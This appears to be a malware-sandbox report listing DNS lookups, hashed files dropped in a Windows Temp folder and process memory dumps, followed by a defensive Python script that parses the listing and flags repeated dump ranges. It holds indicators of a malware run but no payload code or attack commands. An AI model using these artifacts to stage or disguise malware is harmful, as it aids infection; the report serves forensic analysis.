
  • 8.8.8.8:53
    197.87.175.4.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    197.87.175.4.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    72.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    72.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\623615\Wb.com
    Filesize: 925KB
    MD5: 62d09f076e6e0240548c2f837536a46a
    SHA1: 26bdbc63af8abae9a8fb6ec0913a307ef6614cf2
    SHA256: 1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
    SHA512: 32de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f

  • C:\Users\Admin\AppData\Local\Temp\623615\f
    Filesize: 290KB
    MD5: 44bb200868649a063953cf0bb7528502
    SHA1: 7db0b074ddb4f52eaf6ecbfbf41ce67a44b0daee
    SHA256: 7d2d6b8d47b9ee4ade15bd0c992190554268f235c18b27ea8c213d474ad6f7d8
    SHA512: 5592078c4aa02737000942fe204111c72c547b0732a26cb776c572441dbe8bcb9dcbe2443ede3fee47899e88e998f2a3b610ced103e834fa34673f28b55e5ba8

  • C:\Users\Admin\AppData\Local\Temp\Advisor
    Filesize: 96KB
    MD5: cf44a9847f3fb78e1b20e0f6058e073a
    SHA1: 47517215a4145d9dcddb3306c0fb931c71ddfe9d
    SHA256: d2e7128b474ac99272c683aaeee8a8f8bdc8638a28d7b5e769c2b894ebc45b31
    SHA512: eaa9141b5c4bc8fcad07bf71a6dc14990b83b472bb8fbc156aaf694bc4a9fd984793f4bcd4058b6fb3d6fe88ad828bce2a8d44f556d3f67870ac484021510fe4

  • C:\Users\Admin\AppData\Local\Temp\Belt
    Filesize: 61KB
    MD5: bbe29e56ffe75996e8ca9090d7d77f90
    SHA1: d9aa67c8d72e772a80a5fe91b5fa2055abd7f703
    SHA256: 09ef3302b1439ce599d2aba0d63131a3c4dcbcba50a37abf97d700f120e5fcc1
    SHA512: f0270133761b242495f079a91625ee365d2e9b127de3ecc773f0228fdf6e874b53ecfc09ab81ee7c5b0b8c5edba99ca74017692d032c0ba520951b92d267cf3e

  • C:\Users\Admin\AppData\Local\Temp\Convergence
    Filesize: 64KB
    MD5: ee05be18d113eb275f51315fb037f70d
    SHA1: 7869c95e14b3b7f62dcff7f1f2466176af343cd5
    SHA256: 0f914bbe769aa4e7b0e26e0fa78714a7213050ef3907ccfa4a1488ce3b20df45
    SHA512: 0c857df0f87b7b4b53492aa743064c11335d1d99ae82d4ea252048d3b7550174224212dc9ee15b075be371b84fd17a5ee3cf1c7094fd0586d90e9f88b2a46045

  • C:\Users\Admin\AppData\Local\Temp\Distances
    Filesize: 476KB
    MD5: c83a25d37c14b33c8c977950706e4087
    SHA1: 6116cf0a57be99402db4c76f72751e33d45b055f
    SHA256: d84347b22e026490edb739141cd5aee2e1a97ee6050e07b93df005a61ec29f6f
    SHA512: 78ec95011f8ba59a734bc2706cb311201da0014863b374bb9431394d716095887cd1a923dd39442da8d5d0ba9fa6976e1eadf4eaa836e9c6583d322f9dd55c8f

  • C:\Users\Admin\AppData\Local\Temp\Ensures
    Filesize: 82KB
    MD5: 9055cd07ebc236d6a9ed59a00976303f
    SHA1: b55ef932607c144e36b6729f59a0df49af31c546
    SHA256: d08694349bc677e90fe0d2e398d84022057b042c386d861273e6b7339f532249
    SHA512: 9344045948b93c8305703e9e5e2ed6bb58535028ad58881e06727ae88b058e19e25fd7e790739383b1a3e1b2f11f73afac7fd9dca7bb677cc90da426d3996abe

  • C:\Users\Admin\AppData\Local\Temp\Fitting
    Filesize: 86KB
    MD5: ad99fa74f69f99f32fa2d01579bf7080
    SHA1: 0b94621b4c8d976de408e736811af2a2b231dd85
    SHA256: 50d7f8da31679bb21dd88a973c03ea2d5da501f7b241a740bc1fa98c5b53ccbb
    SHA512: 77ae1948f088abd47ab53d8c228dff2b0479f73a455cc33a4f2ad3bf8f855579fc07a1d6e962c4d822de63fe3e0b01973b7d1608f12bd6893a04ec9619b9c10b

  • C:\Users\Admin\AppData\Local\Temp\Forth
    Filesize: 25KB
    MD5: 2cbba7ba80508761f55ffd4beb853102
    SHA1: fe71788dca26e77f22548ffc39f01bc8f55d2823
    SHA256: b5f643db2b4dfc24718865707806f6dd22d9a54eae16a603c7feffe9d98b49ce
    SHA512: 14ab42b3b60d7e7032b0836d0a53670a2d231200121da5618b06962a401903720a736df28d049f7cb3fe21e8da09acc6dafae5b86bb6afbd79307d99b80c6c09

  • C:\Users\Admin\AppData\Local\Temp\Gradually
    Filesize: 125KB
    MD5: b472c3173839488298c86f463853d522
    SHA1: 4ea19e681d58dbd02318522523117290e5c34f64
    SHA256: 0ff238b71b54c5f33f282ca1e5c3d448bdc37ad8e67ef818766eaf965ee39b8d
    SHA512: 6b1a0b419229c0e101624d293640e12ca15de1063ea1ed8f1223072c5071cd952d57e2d7fe88e7f68b295e52b899b3773545b6e7e4fc127d0742814eb2a645e8

  • C:\Users\Admin\AppData\Local\Temp\Improve
    Filesize: 7KB
    MD5: 9748ff1c8dd58352459f2451049af2a2
    SHA1: c0a19f1e749fa58bc03b7207d1be88d054c6c16d
    SHA256: f6d4c8ebb3c24d734f4888df2ceca12f2836bb999f58e78dcd05cff4b27c135b
    SHA512: 3eb9d6beac6ea2c1fd8ecfcbcf159459b0b236b2c997191e84da058d5162cc9a77d132ebc42fde26891e13959ddc2a81bc8cc47c97111e42c7e5ba4e6e33ee9f

  • C:\Users\Admin\AppData\Local\Temp\Ix
    Filesize: 1KB
    MD5: 9adb0ca1567f35d30c412cbe89a53027
    SHA1: a32e1d9eb580ce408943b1d91372091967b18be9
    SHA256: 29b99f845b00ea87a7da8b57001bf0561d5c87ebdda8caefaa3248edd7c87dca
    SHA512: 986234c956d90c732656dd16de58b528af17040364311f89f8d98a45736a7dd9c6394d4c36028b73575ded030654a84512711fa14153f079284508e964f40da6

  • C:\Users\Admin\AppData\Local\Temp\Kenny
    Filesize: 75KB
    MD5: 4f00e7d3c58ab52d2c6e8b6935b14e0d
    SHA1: 634aaef4c09cc4f8be78c7a8d1b7cb72f184c073
    SHA256: 1629fda7c2acc6e2c91b128fcd713efc4282fe6ac169d3804f639c16957efff0
    SHA512: 64873a21e2c0a581f9ab4ff6933fabcf117860998e73227340d0666d2c0e7017de8f57db8216dd643f9daf8c11ce73eef41e986e55ee7b64aad30435a6d5bde1

  • C:\Users\Admin\AppData\Local\Temp\Loud
    Filesize: 56KB
    MD5: 8daac6f10e63c4e0b8dddecaf6b8e0ef
    SHA1: 39441368910496dc889fe74ae20963e53f08a459
    SHA256: 3a479c5821fce8189ca2d04b48f7078f2266e8fd80e57ca4b6f4b9b2b724b26f
    SHA512: 7064cd9bbac4f9b792528b98b1f86bb9a283481f16c85a792d34c0d2f30a9bc4200cdf12eadfffc6720ef64b2df4187828dc7df0e836aeb7bb2ab6ccd022c93c

  • C:\Users\Admin\AppData\Local\Temp\Malawi
    Filesize: 136KB
    MD5: 6567d0c4aca999258d881932a4a6925a
    SHA1: c82d413aa3d63f8b540f5ec85cb6993323c80a39
    SHA256: b54a2ab660d285af9f9e829d97a7550b1640803c1bea965e747e92cb29a54ca3
    SHA512: 4cb7fa0c47009134d29523cfa005541eeb4f755bb884117a25983f3c92bd69a7d4f6499429074f5f9ff0597e4abc1c08cd804f78bcbb694d84f1bb522efc5dba

  • C:\Users\Admin\AppData\Local\Temp\Promotes
    Filesize: 63KB
    MD5: d46df033b2afd716f44e8e9482b0c3f1
    SHA1: 058928cf46326c10f4f11bc817c387f4a3ad1a49
    SHA256: d96c4cc9b7c57e3999b16a9ce661208b6d7782c6d12d9b7054cf737a18765d11
    SHA512: 2436c4733b94a8b8ec58d321fa4533af7ad1cae69bd4b5e7cb4e7d50b00fb369fd421664f0f1851f7634cba86e6ed81622c3099974ced2d81a9279616bab4f46

  • C:\Users\Admin\AppData\Local\Temp\Publicity
    Filesize: 86KB
    MD5: ff2ceec537d5b6f00e079f35a28eca2f
    SHA1: 02e6b54bf4bb40e8aa2e633331f1a6fcb8e4fd43
    SHA256: a42a43439f637db2cd812fcf086388808bbf5dd103e7e7d20590707d0c38597e
    SHA512: 26bfa8b19d875d41601f538a99d4eaa0fc04388f6d0689e2b4d22607aac5261e03e42d2e2804690ce1d6fc3a9317a969b1d0d94568cbd6a73843e7fdefc1989b

  • C:\Users\Admin\AppData\Local\Temp\RESB016.tmp
    Filesize: 1KB
    MD5: d1b8afa0e0fcf6f7d00f594ffb8a446d
    SHA1: 287aab744ba1829c4f9dfece901f7beafcb5cbdb
    SHA256: 2f68d7946ee3e43911a5baca09dbf567bf6c9b7b745eaa53e0a557ed1247d555
    SHA512: 5bf3059f5fd137175e9bee16fc64677be49ed03d0d0c20d8f4bbd704ece5f26307bbf58c299563c7363eca4fd7679192958a926785b5970167e439f7be417ee5

  • C:\Users\Admin\AppData\Local\Temp\Trademarks
    Filesize: 87KB
    MD5: 0d9676b0ace617d2f4b1e3d382fff695
    SHA1: 5b60c826a38c70430bab8017b76a27d945fbdbe3
    SHA256: 738d4b9e1c15109b85d7f0a06748dcf4ec018a0ef4abe917552f59a84ae6c03d
    SHA512: b81d208d807634b9be1fc42f036fd4da41e50f84edd232b736f8588b22c5a4cf7534196ce6c873f2e9bab264ad4a11a9f5cbd3e6037e85dae58e766e81369188

  • C:\Users\Admin\AppData\Local\Temp\Wal
    Filesize: 119KB
    MD5: 19046e554a09e864445f82438d104a1a
    SHA1: 0706e729f7a4e535050dff2b2830781afc47d38e
    SHA256: 05f50ab0792f99e7d107ec120f436a093d94d97b75bcde861e19fa29f842c8f1
    SHA512: 2c9c9385bcec66ba5dd11dff14e383f72fc67e3be3f3529cbae8b2a4741f13b1b931a692c4b6f7ba2a5a0a9958141f7e6100d0ea631feee887fa6d279ad2e24a

  • C:\Users\Admin\AppData\Local\Temp\Wordpress
    Filesize: 70KB
    MD5: de0be63d4a9cd3b9d4137ec3c72d0951
    SHA1: 19f744279539dd41f4e591c5efe35101f3a7f5bc
    SHA256: 6f2d36e5713cd1a319a8ce22171b16c95c9d0c3d7f75ff6a93e1ebdf19dc8977
    SHA512: 3ab18e5de48ad1aff696855a7925d32f2e3fa3682f9cd421d7337caa9b35c9f3070b75c20711be9e016959fa8ed17176cc3fccf5af8bb2304edc57fbf37b4b82

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xcrwzez1.ht0.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\drtg4eyr.uj3.exe
    Filesize: 1.1MB
    MD5: 06342512b7bcdfdda8d6ea8e2d5a24e4
    SHA1: 5a656ac27d5a03ee63f08dd499bacd01e0a12c3f
    SHA256: 89b55665c76315777e1f2a9a5be784fd2590b917388f657c6f5c2caa055e87c2
    SHA512: 5824c39a30b7acacd949812bafcf99afcdc95361b2196567aae4e1f2445803c37971a572537c132a01b930e204745ccf7f082386147ea3b611c745eef2ea3eb4

  • C:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.dll
    Filesize: 3KB
    MD5: 1745851107293dabfe58d1f869e724d8
    SHA1: eadcab422e6047d0629b16e914013bd3e6440e7c
    SHA256: 66df32844b7a813a098310a55efe268bc34594bca3f67a46ca8173eec75a99e7
    SHA512: 2b6591f030046aa84089b39d999e81e38d5fa883858ff268cc1c030cf653fc6ef2f5b1eafa7414cc23c21787e125099321b8f415a9650cd63c6131c958bfc153

  • \??\c:\Users\Admin\AppData\Local\Temp\obnnmmot\CSC8DF14D57E40E4CD59F40DFE961FA71E.TMP
    Filesize: 652B
    MD5: 5a54b07cbd87b6fc15925e820f2ccfce
    SHA1: 849cf853dc76f889295ed72a4f4d0d0166272497
    SHA256: 34a4b9079cfc1b4887f87ca23b651148dcb85bfd7339c0e3f0749d65cae31886
    SHA512: c29fd74980cc6c06e4f5193ef44be4e0ccf5d558aeafb13826ec8d7bc44ebe45f168dc9cd5ab84a929ea4eaa1eb330cb06ce396812f8b1d22250fc0f60660c59

  • \??\c:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.0.cs
    Filesize: 648B
    MD5: 8539b6708ddc98df3a1cd74954dc89bd
    SHA1: a69c850c26e8ecd62a3dc997164d4c92617fa40d
    SHA256: 0b0d3909c6bdbccc83f6206dd9e50cb8fcfa9cbdc250ac5d926cd0f8698adc3d
    SHA512: c7d9a203876b75dba73305732026b0d0c6bc699870731a8a67066c1ec068cc6b05a5b3ab64384005f1dcf81fd0a5d5713a30885a56016126258db76d9a2f5afa

  • \??\c:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.cmdline
    Filesize: 369B
    MD5: c0a5dbe844130014b9edb775c4a83e2e
    SHA1: 13ec67886d7b81f018886aed8882761ef5590390
    SHA256: 5f03645c289113af9286d74e851c7ab82c7b6e4cdf461fb5bfaf6dcb790503e4
    SHA512: dbe4bb685eec0ce2a61c7c3edff4748ad8e59f277d02db25a466853675540e34dacc4e973faefbe10461b3334a4dde4407755c25b7456a449381fdff01d17830

  • memory/1392-118-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-116-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-117-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-121-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-120-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-119-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-128-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/1392-129-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB

  • memory/2268-21-0x0000000006390000-0x00000000063AA000-memory.dmp
    Filesize: 104KB

  • memory/2268-54-0x00000000716B0000-0x0000000071E60000-memory.dmp
    Filesize: 7.7MB

  • memory/2268-50-0x0000000008670000-0x0000000008B9C000-memory.dmp
    Filesize: 5.2MB

  • memory/2268-38-0x0000000007E20000-0x0000000007E28000-memory.dmp
    Filesize: 32KB

  • memory/2268-25-0x0000000007F70000-0x0000000008132000-memory.dmp
    Filesize: 1.8MB

  • memory/2268-24-0x0000000007CE0000-0x0000000007D92000-memory.dmp
    Filesize: 712KB

  • memory/2268-23-0x0000000007BD0000-0x0000000007C20000-memory.dmp
    Filesize: 320KB

  • memory/2268-22-0x00000000716B0000-0x0000000071E60000-memory.dmp
    Filesize: 7.7MB

  • memory/2268-0-0x00000000716BE000-0x00000000716BF000-memory.dmp
    Filesize: 4KB

  • memory/2268-20-0x0000000007500000-0x0000000007B7A000-memory.dmp
    Filesize: 6.5MB

  • memory/2268-19-0x0000000006440000-0x000000000648C000-memory.dmp
    Filesize: 304KB

  • memory/2268-18-0x0000000005EA0000-0x0000000005EBE000-memory.dmp
    Filesize: 120KB

  • memory/2268-14-0x0000000005880000-0x0000000005BD4000-memory.dmp
    Filesize: 3.3MB

  • memory/2268-6-0x00000000055F0000-0x0000000005656000-memory.dmp
    Filesize: 408KB

  • memory/2268-7-0x00000000056D0000-0x0000000005736000-memory.dmp
    Filesize: 408KB

  • memory/2268-5-0x0000000004F10000-0x0000000004F32000-memory.dmp
    Filesize: 136KB

  • memory/2268-4-0x00000000716B0000-0x0000000071E60000-memory.dmp
    Filesize: 7.7MB

  • memory/2268-3-0x0000000004FC0000-0x00000000055E8000-memory.dmp
    Filesize: 6.2MB

  • memory/2268-2-0x00000000716B0000-0x0000000071E60000-memory.dmp
    Filesize: 7.7MB

  • memory/2268-1-0x0000000004910000-0x0000000004946000-memory.dmp
    Filesize: 216KB
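
Two things in this listing are worth pulling out programmatically rather than by eye. First, the `obnnmmot` directory (a `.0.cs` source, a `.cmdline`, the compiled `.dll`, a `CSC*.TMP` and the `RESB016.tmp` resource file) together with `__PSScriptPolicyTest_*.ps1` is the on-disk footprint PowerShell leaves when `Add-Type` hands C# to `csc.exe`, so those hashes identify a compile step rather than a payload. Second, PID 1392 has the same 0x44B0000-0x46E9000 range dumped eight times (sequence numbers 116 through 121, 128 and 129) while PID 2268's dumps are mostly distinct ranges; a range that keeps being re-captured is the one to diff between snapshots. The script below is an added example, not tria.ge code: it parses this kind of listing into records, validates hash length and alphabet (so a truncated copy/paste is flagged), recovers PID and address range from each dump name, reports ranges dumped more than once, and checks the rounded Filesize against the exact span in the name. The parsing rules for the two layouts it accepts (key and value on one line separated by `: `, or key on one line and value on the next non-blank line) are an assumption about how the report renders, not a documented format, and `SAMPLE` is a constructed excerpt whose entries are copied from the listing above.

```python
"""Parse a tria.ge dropped-file / memory-dump listing into checkable records.
Added example, not tria.ge code. Accepts both the flattened layout (key on one
line, value on the next non-blank line) and a compact "Key: value" layout; that
is an assumption about the rendering, not a documented format. SAMPLE is a
constructed excerpt; its entries are copied from the report this accompanies."""
import re
from dataclasses import dataclass, field

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
KEYS = {"Filesize", *HASH_LEN}
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}
MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

SAMPLE = r"""
  • C:\Users\Admin\AppData\Local\Temp\623615\Wb.com
    Filesize: 925KB
    MD5: 62d09f076e6e0240548c2f837536a46a
    SHA256: 1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49

  • C:\Users\Admin\AppData\Local\Temp\obnnmmot\obnnmmot.dll

    Filesize

    3KB

    SHA256

    66df32844b7a813a098310a55efe268bc34594bca3f67a46ca8173eec75a99e7

  • memory/1392-118-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB
  • memory/1392-116-0x00000000044B0000-0x00000000046E9000-memory.dmp
    Filesize: 2.2MB
  • memory/2268-21-0x0000000006390000-0x00000000063AA000-memory.dmp
    Filesize: 104KB
"""


@dataclass
class Entry:
    name: str
    size: str = ""
    hashes: dict = field(default_factory=dict)    # algo -> lowercase hex digest
    problems: list = field(default_factory=list)  # e.g. "MD5 malformed"

    def region(self):
        # (pid, seq, lo, hi) for a memory dump name, None for a dropped file.
        m = MEM_RE.match(self.name)
        if not m:
            return None
        pid, seq, lo, hi = m.groups()
        return int(pid), int(seq), int(lo, 16), int(hi, 16)


def _set(entry, key, value):
    if key == "Filesize":
        entry.size = value
        return
    digest = value.lower()
    entry.hashes[key] = digest
    if len(digest) != HASH_LEN[key] or not re.fullmatch(r"[0-9a-f]+", digest):
        entry.problems.append(f"{key} malformed")  # truncated or mistyped digest


def parse_listing(text):
    """A bullet opens a record; a known key takes its value from the same line
    (after ': ') or from the next non-blank line."""
    entries, cur, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("•"):
            cur, pending = Entry(name=line[1:].strip()), None
            entries.append(cur)
        elif cur is None:
            continue
        elif pending is not None:
            _set(cur, pending, line)
            pending = None
        else:
            key, sep, value = line.partition(": ")
            if sep and key in KEYS:
                _set(cur, key, value.strip())
            elif line in KEYS:
                pending = line
    return entries


def repeated_ranges(entries):
    """(pid, lo, hi) -> sorted dump sequence numbers for ranges dumped more than
    once. Treating a re-captured range as a rewritten (unpacking) region is a
    working assumption about the sandbox's dump trigger, not a tria.ge rule."""
    seen = {}
    for e in entries:
        r = e.region()
        if r:
            pid, seq, lo, hi = r
            seen.setdefault((pid, lo, hi), []).append(seq)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def size_consistent(entry, tolerance=0.05):
    """Check the rounded Filesize against the exact span encoded in a dump name."""
    r = entry.region()
    if not r:
        return True
    m = re.fullmatch(r"([\d.]+)\s*([KM]?B)", entry.size)
    shown = float(m.group(1)) * UNITS[m.group(2)]
    span = r[3] - r[2]
    return abs(span - shown) <= tolerance * span
```

Run against the full listing, `repeated_ranges` returns the single PID 1392 range with all eight sequence numbers and nothing for PID 2268 except the 0x716B0000-0x71E60000 range (dumps 2, 4, 22 and 54), and `size_consistent` holds for every dump, which is a cheap sanity check that a hand-copied dump name and its size still belong together.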
